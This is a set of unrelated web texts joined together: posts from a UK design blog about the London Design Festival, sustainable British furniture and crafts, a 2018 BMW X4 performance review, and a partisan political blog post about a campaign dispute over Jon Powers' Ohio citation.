hand-folded from a single roll of paper. Tracey assures me the paper does not attract dust. The pattern’s on Seascape Curiosities‘ Sealace wallpaper are by their nature more fluid. Hand -drawn illustrations inspired by our beautiful underwater landscapes. Using FSC approved and 100% recycled papers, Sara cuts intricate floating marine forms by hand creating three-dimensional wallpapers. The works drew particular attention from Chinese, Japanese and Korean visitors, whose cultures have established traditions of paper-art forms. Paper pulp from old newspapers is the fodder for Crea-Re’s ‘Copermicus’ lighting collection. 100% recycled, the paper mulch is mixed with ochre, or left grey, shaped, and left to dry. The irregular, cracked shape with small holes or craters, means when the “Luna” light is turned on, the light creates a unique, mottled shadow. While I missed the visual impact of the Material Council’s display of material cubes from 2013, this year, ‘Nooks, Niches and Cranniesʼ, featured Trash Glass from Diana Simpson, the first in a series of products developed using reclaimed waste as raw ingredients. With my Welsh connections, I was delighted to catch up with Blodwen‘s founder Denise Lewis. All Blodwen’s new blankets are woven at a 180 year old mill in the Teifi Valley, west Wales, not far from the National Woollen Museum. The Heritage Blanket Collection (£345 each), inspired by a weaver’s pattern book dati ng from the 1700’s, are woven on the original 1930’s Dobcross looms. The striking patterns caught the eye of recent fashion graduate, Sarah Hellen. Inspired by the traditional skills of Welsh artisans, Hellen used some of Blodwen’s Heritage geometric ‘Hiraeth’ pattern for her menswear collection. From baskets to traditional Welsh clogs, Blodwen is committed to the preserving and reviving the rural crafts and skills of Wales. A last word on some accessories. The beautiful A-Z of edible flowers, A Matter of Taste, from Charlotte Day, which pique interest in some overlooked varieties and remind us of nature’s beauty and bounty. I shall have to invest in one of Mary Goodman‘s Seating Spheres, a large wool covered exercise ball, described as a “sculptural addition to contemporary interiors” for use as a footrest, or seat. I have used an exercise ball as my office chair for years. The subtle instability stops any slump at the computer, and rolling around helps keep the blood flowing. All the yarns are ethically sourced, with hard-wearing British wools such as Herdwick, Swalewick, Jacob and Axminster rug wool used for the spheres. Mary Goodman will be showing her work as part of Campaign for Wool Interiors Collection at Southwark Cathedral, 5th -12th October. London Design Festival ended on a high note at Tent London!
https://carefullycurated.co.uk/2013/08/20/welsh-blankets/
Posted in British made, Circular economy, Design shows, Furniture, Lighting, Native species, Natural materials, Wood, Wool Tagged Campaign for Wool, London Design Festival, Sebastian Cox, Tent London
Posted on September 17, 2014 by carefullycurateduk
There was no better way to kick off my London Design Festival 2014 than “The Wish List” at the Victoria and Albert Museum. With a mentoring relationship at its heart, the project began with a conversation between Benchmark, Terence Conran and the American Hardwood Export Council. They conceived of ten leading designers commissioning the object that they had always wanted but never found or had time to design themselves. The ten commissioners chose, or were matched with, up-and-coming designers, for whom it was the commission of a lifetime!
Each of the young designers was given a box of American hardwoods, and the design process unfolded, culminating in an intense, “Making Week”, or first furniture festival, at Benchmark working with master craftsmen skilled in traditional techniques, as well as the latest technologies. Benchmark has embraced sustainability from its outset in 1984, after Sean Sutcliffe, co-founder with Terence Conran, was influenced by Jonathon Porritt. The commitment to sustainability, craftsmanship and expertise in timber (though they also have a specialist metal workshop and an upholstery studio), made Benchmark an ideal partner for AHEC in The Wish List. AHEC were keen not only to showcase the range and properties of American hardwood, but also share the AHEC’s work on life-cycle assessment (LCA) with the designers.
Wood has many environmental virtues: it is organic, renewable, versatile, and a carbon sink. The area covered by American hardwood forests is equivalent to UK, France & Spain combined, and the AHEC estimate that the carbon footprint of all ten projects is less than one return flight to New York. Wood is also probably the material that man has been working with for longer than any other. Wood is sensual and tactile, overtime it responds our touch, changing patina, becoming smooth, or chipped, with each knock or indent becoming part of the story of the object.
The young designers made careful choice of their material. Sebastian Cox asked David Venables of AHEC which were the least popular in the UK and deliberately chose to work with them, seizing the opportunity to elevate their status. Cox, who usually works with greenwood, relished the opportunity to experiment with red oak and cherrywood. Initially Conran had wanted a rail and curtain to screen his desk, in response Sebastian suggested a curved, woven screen. The kiln-dried oak was too inflexible to weave, so Cox made use of swilling, a technique he recently learnt with Lorna Singleton to soften the timber so it was malleable enough to weave. Swilling, or soaking, the timber in the stream at Barton Court, Terence and Vicki Conran’s 18th-century country home, connected the piece to the landscape of its future home.
Known for his innovative use of wood, Alex de Rijke, Dean of the School of Architecture, RCA, and a founding Director of the architectural practice dRMM, pioneered the use of hardwood for cross- laminated timber (CLT) for the Endless Stair he designed at last year’s London Design Festival, so it is unsurprising that he and Barnby & Day chose to use CLT made of American tulipwood. But this fast-growing timber, that is is often overlooked, overpainted and “chopped through to get to the good stuff” is here given the Midas touch. Nathalie de Leval’s shed for Paul Smith was made of thermally modified ash (pictured right, and below with Terence Conran, Paul Smith and Nathalie de Level). Thermally modified timber (TMT) is heat-treated for three or four days in an inert atmosphere (no oxygen). The process irreversibly changes the chemical and physical properties of the wood so that does not need additional treatment as it is more resistant to rot, fungi and moisture.
The Wish List fused the craft of design and the craft of making. A conversation with some of the designers, commissioners, and Sean Sutcliffe, chaired by Edwin Heathcote, explored the relationship between the two. Heathcote recounted a recent visit to a design school without workshops. Today industrial design is often separated from making with products moving from design to rapid prototyping and then manufacture overseas. Sean Sutcliffe offered a definition of craft from Richard Sennett, author of The Craftsmen, as when “the point of focus becomes the limit of the tool”.
The Ves-sel that Gareth Neal made for Zaha Hadid is a perfect example of engaging traditional process and digital manufacture. Neal said he “provocated Sean to use the CNC router”, and Benchmark had to upgrade its software accordingly. Neal had been invited to Hadid’s company offices and use their modelling software to create the vessel’s design that captures the fluidity of Hadid’s designs, and functions as a water carafe. One of the vessel’s was left unpainted, after consultation with Hadid, to reveal the natural colour. The vessel is extruded along one axis, with a slit at the end creating what Neal describes as a ‘cathedral-like space’. If not monumental in scale, it is in complexity. Sutcliffe described the object as an outstanding piece of craftsmanship, “the most remarkable thing we have ever made”.
Continuous involvement in the process, and evolvement of skill underpins the best craftsmanship, and several commissioners warn of the limitation of digital tools. As Amanda Levete noted the link between intellect and hand becomes more remote with technology, an element of control is relinquished. Something may seem perfectly resolved, but not be conceptually perfect, but without space for adjustment. With rapid prototyping a hundred options can be quickly, and extravagantly, produced, but does this ease compensate for a lack of rigour at the design stage? Making great objects is often an iterative process in response to the material. For Alex de Rijke one of the constraints of digital technology is that computers do not have the same dialogue with materials or scale. Alison Brooks, too, describes how computer design can quickly take a designer into complexity that they have to navigate out of, often through physical experimentation.
The “Making Week” brought many of these tensions to the fore. With no experience of physical making, Win Assakul was persuaded to pick up hand tools to craft the 3m long serving dish he designed for Amanda Levete. Hand-making is part of the story of the object, requiring considered, elegant solutions to the complex shape and presentation of the dish.
The “Table-Turned” Barnby & Day designed for Alex de Rijke presented the challenge of scale. Weighing 170kg, and with a diameter of 2m, the table is quiet possibly one of the largest objects to be turned on a lathe. Benchmark brought in specialist turner Mike Bradley to turn the table in 3 sections, with the largest section turning at 62mph on the outer edge.
Even skilled craftsman, Sebastian Cox was presented with new challenges. The Conran commission, “Getting Aware from it All” was, Cox said, “the most intricate and challenging thing that I had ever made, but how often will I get the chance to design for someone who is so important in the industry?” If the screens were 1mm out at the joint, they would be 5mm our where they met. The rolling tambour is made from solid strips of wood, rather than cloth-backed and there is a secret drawer. The compliment was repaid by Conran, “I have been making furniture for 60 years but I am still learning from Sebastian”.
Not all the project were conceived as one-offs. Felix de Pass’ “A Stool for the Kitchen” designed with Alison Brooks could in future grace our homes. The series of architectural elements, “Room”, designed by Atelier Areti with John Pawson could indeed make the everyday more beautiful. Simple, elegant forms finished with an incredible attention to detail. For example, the grain on the dimmer knob of the light switch is aligned with that of the base plate when it is switched off.
Wish list is about design, and beautiful materials. For the commissioners it was an unusual role reversal, a process Amanda Levete found moving as though handing the baton on to the next generation of inspiring designers. It is also about the intensity of making, the joy of sharing collaboratively, and the richer learning that results: that was perhaps the real alchemy of the Wish List. Sean Sutcliffe certainly hopes that seed has been sown.
The AHEC Wish List page has a playlist of short films of each of the pieces, but the installation is definitely worth a visit to the V&A!
Image credits: AHEC, or my own.
https://carefullycurated.co.uk/2014/09/14/looking-ahead-to-london-design-festival/
Come & watch Lorna Singleton demonstrating swill basketry @thenewcraftsmen this Wednesday #LDF14 pic.twitter.com/fPZ9J6CvIq
Posted in British made, Craft, Design shows, Furniture, Uncategorized, Wood Tagged craft, Furniture, London Design Festival, Natural material, Sebastian Cox
Looking ahead to London Design Festival
Not that you can have failed to notice, but the London Design Festival started today, an event that promises to “celebrate and promote London as the design capital of the world.” We can be certain it won’t disappoint, though perhaps less confident of seeing all there is to offer.
I will be making a beeline for the Victoria and Albert Museum to see The Wish List. Sir Terence Conran, Benchmark, the London Design Festival and the American Hardwood Export Council (AHEC) paired ten emerging talents with ten design legends to design and make something that they have always wanted, but never been able to find. The superlative bespoke commission, or ultra-mentoring scheme, however you choose to describe it, the results promise to be wonderful.
My particular picks will be Sebastian Cox’s workspace for Terence Conran and Gareth Neal’s carafe for Zaha Hadid.
Also at the V&A is a demonstration of the circular economy in action as Ella Doran, Galapagos Designs, and the RSA’s Great Recovery Project deconstruct and refurbish several upholstered chairs in the V&A Design Studio. The circular economy is a different approach to design, manufacture and material recovery that avoids losing valuable materials to landfill. It might whet your appetite to visit the Great Recovery’s new home, the Fab Lab London, which opens its doors on Friday 19th September. There will be a Restart party to tend to broken electronics, ‘Fixperts’ and tear-down & design-up workshops happening all day to prompt visitors to think about products in a more circular way.
Opening on Wednesday 17th (and running to the 20th September at Earls Court) is 100% Design, the biggest of the contemporary design shows. This is its twentieth year so there will be a rare vintage mix of design talent as well as five zones of British and international design products on show. I will be making a bee-line for the Eco, Design & Build hub, designed and curated by Thomas Matthews in partnership with SCIN Gallery. The Materials Landscape promises to take visitors to exciting new territory. The Makers Carousel by Mette has caught my eye, with the Maker Library Network running a workshop making useful objects out of waste products on the 17th, including how to make bricks from business cards. By the end of LDF we will probably all have collected enough raw material to join in!
Elsewhere at 100% Design, I will be checking out Jennifer Newman Studio‘s M-Bamboo Table ; Lozi for his distinctive geometric furniture; Lucy Turner for her modern marquetry on upcycled mid-century furniture; Pinch for the gorgeous, graceful pieces that I have been coveting for sometime; and the Wood Awards to see Namon Gaston‘s Fosse Desk and Sebastian Cox’s Ten Species Tall Boy. The session entitled “The Big Question: What impact will synthetic biology have on design?” on Saturday 20th at 1pm featuring Daan Roosegarde, who has designed glow-in the dark trees using bio-luminscent qualities of jellyfish to replace street lamps, and Rachel Armstrong who designs buildings that repair themselves, sounds like an invitation to wonderland.
After a full day planned at 100%design, the evening of the 17th September is the SustainRCA Show preview and Awards. With 36 finalists working with the value of waste, the plight of bees, great gadgets and smarter systems (the smart shopping app, Disclosed, is pictured left), the judges have a tough call. Perhaps Mohammed J Ali’s A New Enlightenment which imagines a sharing economy around renewable energy, shared goods, services and information will triumph? Ali used an independent Scotland as a case study, so by the end of this week it may no longer be an imagined scenario.
Heading east is designjunction, taking place at the Old Sorting Office, New Oxford St. London from the 18th to the 21st of September. I’ll be dropping in to see Made in Ratio’s updated Supernova table, with a new 100% recycled aluminium finish; marvelling at master craftsmen from Waterford Crystal and Bert & May at the Flash Factories; admiring ercol‘s and Anglepoise timeless classics given a bespoke overhaul as the part of the ‘A Child’s Dream’ silent auction (Tom Dixon’s design is pictured right); checking out Anthony Dickens light for new brand Made in the Forge, Hend Krichen, cherchbi, Kristjana Williams, Africa Calling and Tom Raffield. If it didn’t clash with the climate march, I would be back to hear Kathy Shenoy, Shake the Dust, and Heath Nash, South African designer and British Council ‘Maker Librarian’ discussing the rise in interest in regional artisans, craft and design work from around the world on Sunday 21st at 1.30pm.
Further east still to Tent London at the Old Truman Brewery (18th-21st September) to catch up with (in no particular order) Daniel Heath glorious decorative finishes; Galvin Brothers new Cross Lap collection; Seascape Curiousities one year after launch; Sebastian Cox (Shake Cabinet, pictured left), as I can not attend an event where he is exhibiting without coveting his products; Seven Gauge Studios new woven cotton collection; and Tracey Tubb‘s geometric, 3-dimensional, folded wallpapers.
Around the fringe, The Big Small Show, at the Hoxton Basement Gallery (15th – 19th September) promises to be a thought-provoking with a group of recent graduates from the Royal College of Art’s Design Products course engage with contemporary contradictions of global versus local, craft versus mass-manufacture and more.
Another recent RCA graduate, Diana Simpson, is now designer in residence at 19 Greek Street, an innovative interior design studio, gallery,and materials library. Simpson’s Glass Lab turns discards glass bottles into hand-crafted architectural materials, not least of which is the bar top at London’s newest private members club, Library (pictured right).
If you missed seeing Tom Raffield at the RHS Chelsea Flower Show, he will be creating a woodland workshop at at Adventures in Furniture, Islington as part of the new Islington Design District. Elsewhere, there is the debut of the Queens Park Design District, where I hope to sneak a peak at Christoph Behling’s woven wood.
Oh, and there is also home, (co-located with Top Drawer) at Olympia from 14th-16th September for all manner of design-led homewares and interior accessories brands. It will be a whistle-stop tour at best for me with so much to pack into one week. And then it will be Decorex!
I”ll certainly be taking advantage of the West London Design District Visa promotion to invest in a pair of Tracey Neuls‘ shoes to ease my cycling around the city!
Image credits: Benchmark; designjunction/Teddy’s Wish; Diana Simpson; SustainRCA; Thomas Matthews; Tracey Neuls
http://video.ft.com/3775193342001/London-Design-Festival-Made-in-Britain/Editors-Choice
https://carefullycurated.co.uk/2014/04/10/what-a-lot-of-bottle-a-conversation-glass-lab/
https://carefullycurated.co.uk/2014/06/25/show-rca-ringing-the-changes/
Posted in British made, Chair, Design shows, Event, Furniture, Natural materials, Wood Tagged Circular economy, London Design Festival, New materials, RCA, Sebastian Cox, Upcycling
Design Factory @ Clerkenwell Design Week
The buzz at the entrance to the Design Factory was palpable for the opening of Clerkenwell Design Week 2014. By lunchtime the queue to get in was snaking up the street, and with good reason, as there are some exciting stories to tell.
I raced upstairs to see the first pieces from a new collaboration between Sebastian Cox and Benchmark Furniture. The Chestnut and Ash range, made from coppiced chestnut and well-managed ash, includes the SHAKE and LATH series. The SHAKE cabinet (pictured left, w80 d41 h180) and SHAKE sideboard (w150 d45 h80) are made from a solid dovetailed ash carcass with doors made from cleft chestnut shakes, hence the name. Cleaving is the controlled splitting of wood along its grain to create a unique, textured detail that speaks honestly of the materials crafted with such skill.
The LATH chair revisits the traditional ladder-back chair. With laths split from freshly coppiced chestnut and a frame made from ash cut with a CNC router, it is epitomises this new, true collaboration. The chair (w42 d50 h98) is available with a seat in either veg-tan leather, or natural Danish cord (both are pictured with the SHAKE sideboard).
Sean Sutcliffe, MD and co-founder of Benchmark, came across Sebastian’s work when he was judging the Wood Awards 2011 (Sebastian won the Outstanding Design category). Sustainability and craftsmanship have been integral Benchmark Furniture since it launched in 1983, and in 2007, Benchmark won the Queen’s Award for Enterprise in the Sustainable Development category, the first furniture maker to win this award. It is the perfect springboard for Sebastian’s designs.
Whittling away the hours, and sharing some greenwood working gems alongside a splendid Benchmark table was Barn the Spoon (here he is on the right whittling with Sebastian). Barn started woodworking when he was 12, and has not stopped since. He has a shop at 260 Hackney Rd, runs courses and the annual Spoonfest (tickets for 2o14 are already sold out). Working with all manner of wood from London, sycamore, cherry, beech, birch and spalted alder (which has a lovely speckled look), Barn fashions that most essential, and treasured of kitchen implements with great eye for the grain.
It was impossible not to enjoy the arrestingly colourful outdoor furniture from Jennifer Newman. The M-Bamboo Table and M-Bench were voted “Top Product” when first exhibited at last year’s Clerkenwell Design Week. This year, they were back in exuberant fashion made from a base of aluminium (88% recycled and recyclable) with a durable powder-coating finish available in any RAL colour. As with the M-Bamboo, the top of the prototype table pictured is made of bamboo, which grows to maturity within 5 years, with light bamboo for inside, and dark bamboo for outside.
There is other colourful, functional outdoor furniture on the market, but look closely and the joy is in the detail of the Jennifer Newman pieces. The crisp, clean lines as the aluminium folds around the seat of the A-Frame Bench are precise. It takes skill to wrap like that, just ask my husband at Christmas!! The planter on castors would be the perfect home for any citrus or similarly fair-weather plants as they can be rolled into warmer locations when the British weather dictates.
Around the corner, I lingered at the DISCIPLINE stand admiring their concise 2014 collection and manifesto that promises, “Natural materials, sustainability, durability, beauty and simplicity.” DISCIPLINE works with 16 international designers to create function objects for everyday enjoyment from bamboo, cork, glass, leather, metal, stone, textile and wood. I particularly liked the Drifted chair with its cork seat, but it was too early in the day to justify a sit-down! The Drifted series, designed by Lars Beller Fjetland also includes stools, is available in a combination of natural, red and black painted base with dark or light cork seats, priced from £170 for a stool.
Elsewhere, there are further contemporary reinterpretations of traditional chair-making techniques. In particular, leaving the end grain of the legs exposed is used to great effect with the Holton series at James UK (pictured on the left in walnut) and the Occasional Peg table (440mx520mm) from Barnby and Day (pictured here on the right). I was also partial to the brass detailing on Another Country’s Bar Stool One. The various foot rest options are apparently well-suited client of all statures and standings, and the back support steadies those late at the bar!
There is plenty for the bijoux urban home, such as this clever and versatile folding Proppy chair from Devon-based Tandem Studio. The chair can be used inside or out and is surprisingly comfortable with an adjustable back rest. When not in use it can hang from a wall bracket, awaiting the next guest, or freeing your floor space for other things! Available in solid oak or beech and finished in Osmo oil from £225!
For those inspired by RHS Chelsea Flower Show but without an inch of outdoor space, the boskke Sky Planter provides a bit of green indoors. Hanging from the ceiling the Sky Planter uses a terracotta disc to feed water gradually to the roots. Made of ceramic or 100% pre-consumer recycled plastic the planters could keep fresh kitchen herbs very much to hand.
Today, Thursday 22nd May, is the last day of Clerkenwell Design Week so get there while you can, or you’ll have to wait until next year!
Photo credit: boskke; the rest my own!
Posted in British made, Event, Furniture, Natural materials Tagged Furniture, London, Sebastian Cox
Sebastian Cox Pop-up @ Heals
Posted on March 22, 2014 by carefullycurateduk
Catch him while you can. Tomorrow, Sunday 23rd, is the last day of Sebastian Cox’s Woodland Workshop pop-up in Heal’s Tottenham Court Road store. Sebastian is an award-winning designer and maker, with a strong ethos of sustainability. As you might remember from earlier posts, he is famed for his work with coppiced hazel, an ancient method of woodland management.
For the last couple of weekend’s Sebastian and his team (today, George) have been very much front of house for Heal’s ‘Made for you‘ series, hand crafting drawers in the store window.
The stack of drawers are for their latest Heal’s piece, a five drawer ‘Tall-boy’ in celebration of British grown hardwoods. Each drawer is individually crafted using one of ten timbers, showing their distinctive grain, and colour, to subtle and stunning effect. The timbers have all been sustainably sourced. In fact, they can even tell you when the wood was milled and grown. The Tall-boy pictured right is in oak, walnut, sycamore, London plane, and elm. We were particularly struck by the flecking and wavy grain of the elm. The undulating grain is what gives elm its characteristic strength.
Other timbers available are ash, brown oak, chestnut, hazel and birch. The ‘brown oak’ is not a different species, but oak that has been infected with fungus, leaving it a rich tea colour. The choice of timber and tonal scale is yours. If you are undecided, you could order a pair and then mix and match the drawers to your heart’s content. The Tall-boy retails at Heal’s for around £2,000, depending on your choice of timber. Remember a thing of beauty is a joy forever!
Seeing Sebastian and George deftly making use of the range of hand tools was fascinating, for us, and our young daughters. They were enchanted by this real-life Mister Maker, and thoroughly charmed when Sebastian used his hand plane to give them a couple of shavings that spiralled in their palms. They watched, coyly, as George meticulously prepared a dovetail joint. It was a moment for us all to appreciate the skill of hand crafting furniture, to connect the elegant piece with its humble beginnings and reflect on the beauty of Britain’s natural resources.
Posted in British made, Furniture, Native species, Natural materials, Wood Tagged Furniture, Heal's, Natural material, Sebastian Cox
5 of the best table lamps
The clocks have gone back, and as the nights draw in, Diwali, the festival of lights, this week celebrates the victory of good over evil, light over darkness and knowledge over ignorance. And it has been Bonfire Night too. So it seems fitting to shine a light on five of the best table lamps.
1. The Rod table lamp by Sebastian Cox has a shade made of compressed hazel fibres, and the stem is a steam bent hazel rod (H 5 4x W 12 x D 20 cm). The coppiced hazel is grown locally and harvested in the winter as part of a sustainable woodland management programme. Hazel is light, strong, with a fine grain and fast-growing. The lamp is an honest, elegant piece that brings a bit of native British woodland inside. The lamp costs £175 including an LED bulb.
2. The Flos Kelvin mini task lamp, designed by Antonio Citterio, is widely available from retailers including John Lewis for £175. In sleek contrast to the Rod lamp, but with eco-credentials nonetheless as it is made of recycled aluminium. The arm and head are adjustable for focused light from the 30 LED lights which contain a chemically-etched diffuser to soften the light. The lamp’s dimensions are H30 x W12 x D12cm.
3. After natural, renewable and recyclable materials, I have end of life in mind when including the DIY Table Lamp designed by Rona Meyuchas K from Kukka. This is a traditional lamp, with a twist. It could be used at home or the office, or where ever you choose. It is made of 6 screws, 7 pieces of beech wood, lamp holder and cable. The wood is unfinished, so you could paint, lacquer or sand it to suit your style or leave it natural. If you want to short-cut that detail you can order it in a range of 7 colours. The dimensions are 53 x 43 x 10cm, and the lamp costs £115. The lamp is supplied with a 40w reflector bulb, an LED alternative would use around 85% less energy and last 20 times longer, or an energy-saving halogen bulb, which would be around a 30% saving on a standard 40w bulb.
4. Drws y Coed, means to door to the woods in Welsh, and the dappled lighting of their table lamp creates a sense of connection with woodland. The products are made from birch plywood and local Welsh timber. Digital technologies, such as laser cutting enable a micro manufacturing in North Wales close to sources of timber, and inspiration. The Merddyn Gwyn Lamp (pictured) is based on a beaker from Merddyn Gwyn Bronze Age archeological site in Anglesey. The dimensions are H38 x W12 x D12 cm and costs £90. In a waste not, want not vein, the pieces of ply laser cut out of the top of the lamps are repurposed as coasters!
5. D.I.Y. Either refresh an existing lamp, revive an ebay purchase, or start from scratch. A wine bottle is a popular choice for a lamp base, or a vintage find. You can buy table lamp kits online, and follow instructions online from Wikihow, or find a local course. In London, the Goodlife Centre runs How to make a lamp evening courses. Be sure to read and heed all warnings and follow the directions with the lamp kit. For simple instructions on how to make a lampshade visit the Channel 4 website, or find a local course and get some tips from an expert. Lolly & Boo run lampshade courses in a couple of locations in the south, and Rustiques run workshops with Annie Sloan paints and fabrics in Aberdeenshire. Have a peek at Folly & Glee for a range of DIY lamp making accessories and inspiration.
Posted in British made, Lighting, Natural materials, Repairs, Skills and courses, Uncategorized, Upcycle Tagged Antonio Citterio, Sebastian Cox
Tent London & Super Brands highlights
In the Scale of Carbon sat at the centre of the Super Brands event during the London Design Festival. The exhibition, by the Materials Council, represented the volume of various architectural materials that can be produced for one tonne of carbon dioxide emissions. Each of the materials was physically represented in a cube form and, the larger the cube the greater the quantity of that material that could be produced for the same volume of CO2 emissions, or ’embodied carbon’. A literal measure of sustainability. Carbon isn’t the only measure, but it is an important one. The average new UK home releases around 50 tonnes of CO2 embodied carbon in its construction, that is enough carbon to drive around the earth 11 times!
Next door, Interface, a leading commercial carpet tile manufacturer, showcased its Net Effect products. Net-Works is a partnership programme between Interface and the Zoological Society of London (ZSL) and Aquafil to tackle the problem of discarded fishing nets. Net Works takes discarded fishing nets from remote fishing communities and recycles them into carpet tiles, the Net Effect products. The programme aims to collect 200kg of nets from each village every month. The result, beautiful carpet tiles that capture the colour and texture of the ocean.
There was plenty more biophilic design on display: Hand drawn wallpapers inspired by rural Shropshire from Katherine Morris at Earth Inke. The teasels in cream tea were developed using natural clays from Shropshire; Abigail Edwards had sky, seascapes and owls adorning her wallpapers printed with hand mixed non-toxic water based ink; and the english countryside are the chocolate creative’s inspiration for theirnew English Romantic Collection of cushions.
Bold & Noble‘s collection of wallpapers and screen prints cherish a connection with nature with depictions of trees or birds around Britain, a ‘Grow your Own’ calendar or reminder to Bee Kind referencing bee-friendly plants (£43, 50x70cm).
I loved Daniel Heath‘s antique wall mirrors, and reclaimed Welsh slate tiles engraved with an Espalier (fruit trees growing horizontally) design complete with jays perching between gnarled apple branches ripe with fruit.
Recycling and upcycling was in evidence at Furniture Magpies, Galapagos, Sukie’s recycled papers and cards, and the vibrant textiles of Parris Wakefield on furniture from Out of the Dark, a charitable social enterprise that recycles, restores and revamps salvaged furniture. Chunky knits were used to great effect as upholstery by Rose Sharp Jones and Melanie Porter.
Design and craftsmanship were plentiful at the Galvin Brothers, nominees for Best British Designer at the Elle Decoration British Design Awards, 2013. Their Moonshine footstool was a hit. All of Sebastian Cox‘s work is made fro m British hardwoods from well managed forests. The ‘Rod’ desk lamp is made from compressed hazel fibres for the shade and steam bent hazel for the rob. It has an LED bulb, and R.R.P. is £175. The hazel is hand coppiced in Kent. I also liked the Suent, lightweight chair with its woven seat.
Finally, Studio180° launched their eco modular sofa and horsehair mattress. The sofa is made of the highest quality natural materials with out glue or steel coils, and the “Cradle-To-Cradle” circular economy model is at the heart of the design. All the materials used, except zips, are either biodegradable or recyclable and free from toxic flame retardants and harmful chemicals. The chaise-longue element is provided by a full mattress made of horsetail hair. Horsehair, with its natural springiness, has been used in bedding for centuries, and is still used by premium brands such as Vi-Spring. I could have lingered for a long time on the Sen sofa, but duty called!
Posted in Bedding, British made, Circular economy, Design shows, Fabric, Flooring, Furniture, Interiors, Native species, Natural materials, Recycled, Textiles, Uncategorized Tagged London Design Festival, Natural material, Sebastian Cox
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#12 out of 14 in 2018 Luxury Compact SUVs
2018 BMW X4 Performance Review
Note: This performance review was created when the 2018 BMW X4 was new.
Performance: 8.8
The 2018 BMW X4 features a potent turbo-four base engine and is available with an even quicker turbocharged six-cylinder. The X4 gets average fuel economy for the class, but it's among the best when it comes to handling. All-wheel drive is standard, which is not the case in many competitors.
"BMW's SUVs (or whatever you want to call them) have always differentiated themselves with their 'BMW-ness' (or whatever you want to call it). That is, they do a good job imitating a sports sedan while offering the practicality of an SUV. The X4 shifts even more toward the sports sedan, with both trims offering quick acceleration and spry handling." -- Kelley Blue Book (2017)
There is another key difference between the X4 and the X3. It's called the M40i. Unique to the X4, this high-performance model builds on the outgoing xDrive35i model. With a whopping 360 horsepower and numerous handling enhancements, it ups the ante in this segment just as compelling new performance entries like the Jaguar F-Pace, Mercedes-Benz GLC43 AMG Coupe and Porsche Macan GTS arrive on the scene for 2017." -- Edmunds (2017)
"It would appear BMW's plan was to make the X4 even more sporty than the already sporty X3 it's based on, and to that end it feels pretty quick in a straight line and actually goes around a corner quite well." -- Motor Trend (2015)
Acceleration and Power
One of the main differences between the X4's two trims is their engines. The base 28i features a turbocharged 2.0-liter four-cylinder engine that puts out 240 horsepower. It provides enough power for highway driving, and acceleration is pretty quick.
The M40i comes with a turbocharged 3.0-liter six-cylinder that produces 355 horsepower. Its acceleration is even stronger, and it will throw you back in your seat when you put the hammer down. It probably provides more power than people need from a daily driver.
When it comes to fuel economy, the base engine is the clear winner. It earns an EPA-estimated 20 mpg in the city and 28 mpg on the highway. Those are typical ratings for a luxury compact SUV. With the larger engine, the X4's gas mileage drops to 18 mpg in the city and 25 mpg on the highway.
Both engines are mated to an eight-speed automatic transmission.
"There are no complaints when it comes to performance. The 'base' turbo four-cylinder packs a real wallop when you put your foot in it, pressing you back in your seat and making a mockery of its claimed 240-hp output. Really, this is more than enough power for most shoppers. Only those desiring overkill should consider the M40i, which is a legitimate high-performance proposition with acceleration numbers that rival high-powered sport sedans." -- Edmunds (2017)
"Two turbocharged engines -- one powerful, one really powerful -- tempt the right foot of BMW X4 drivers. On the 2017 X4 xDrive28i there's the tried-and-true 2.0-liter turbocharged 4-cylinder we've come to love in so many other BMW models. The new X4 M40i offers a revamped version of the turbocharged 3.0-liter 6-cylinder we love even more." -- Kelley Blue Book (2017)
Handling and Braking
Most luxury compact SUVs can't move like the X4 can. It has outstanding agility and feels planted around turns, making it one of the most athletic vehicles in the class. Standard all-wheel drive means that the X4 also has plenty of road grip. Of the two trims, the M40i is the better athlete, as the base 28i trim is more comfort-oriented. Still, this vehicle can hold its own against other dynamic SUVs like the Porsche Macan and Jaguar F-Pace. A Dynamic Damper Control system, which automatically adjusts the suspension based on road conditions, is available.
"With a taut suspension designed more for twisty roads than rough ones, the X4 is remarkably fun to fling about." -- Kelley Blue Book (2017)
Similar accolades can be heaped upon the M40i's prowess around corners, as its steering and road-holding abilities should stand up well to not only the Porsche Macan but also other competitors from Jaguar and Mercedes. The same can't quite be said of the xDrive28i, though, which we've found to be a bit squishy and ponderous for a vehicle bearing the BMW badge. It's more comfort-oriented, which may nevertheless be welcomed by some shoppers." -- Edmunds (2017)
"Off the motorway and along the twisty two-laners that snake around the Basque country, however, the X4 proved to be thoroughly entertaining. Steering could use a bit more feel, as ever, but turn-in is sharp and precise, with no delay in response and no on-center dead spot. With its added power, sharp steering response, and rear-axle torque distribution, corner carving in the X4 was easy if a bit surreal, considering how high up we were sitting." -- Autoblog (2015)
2018 X4 Photos
All Exterior Photos »
All Interior Photos »
Calculate 2018 BMW X4 Monthly Payment Calculate 2018 BMW X4 Monthly Lease Payment Which Cars You Can Afford?
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Who's Afraid?
Jack Davis and the Republican Party, that’s who’s afraid.
Just one week out after peddling a story accusing Jon Powers of running War Kids Relief into the ground and enriching himself in the process, the Jack Davis campaign goes back to its bitter well of desperation and trots out a story that Jon Powers was arrested in Ohio for cursing out a cop. A flat-out lie.
But Powers spokeswoman Victoria Dillon saw the incident differently. She said Powers was with college friends and fellow veterans in the area, and denied at the time and denies now that he ever used obscene language in addressing the officer. She also offered to produce witnesses to back up Powers.
“At a time when he’s under investigation and running from revelations of election fraud and bribery, the Davis campaign is practicing the lowest form of politics by distorting simple facts,” Dillon said. “Jon was written a ticket for jaywalking, never arrested and never showed any disrespect to law enforcement.”
But a spokeswoman for the Cleveland Heights Municipal Court said Powers changed his plea of not guilty to the original Class 4 misdemeanor charge to “no contest” in connection with a minor misdemeanor on Jan. 11, 2005, and that there was no mention of jaywalking in the final disposition of the case.
Dillon disagrees.
“When you look at the full statute, jaywalking is part of that statute,” she said.
A review of the Ohio criminal code defines a number of offenses that would constitute disorderly conduct — but not jaywalking.
Dillon, however, countered that it would refer to a section outlining “hindering or preventing the movement of persons on a public street.”
Powers was fined $25 and assessed $65 in court costs.
Gosh, that’s a lot of paragraphs for a $25 ticket. Powers wasn’t arrested. And he didn’t plead, and wasn’t found, guilty. And he paid a ticket. If Davis wants to paint Powers as being a one-time, one-man jaywalking spree, then that’s fine. But it doesn’t change the fact that Davis has nothing whatsoever to run on as a candidate. Oh, and when the Powers campaign offered to put McCarthy in touch with other people who witnessed the event? McCarthy wasn’t interested. He was all about covering the politics of it – not the facts.
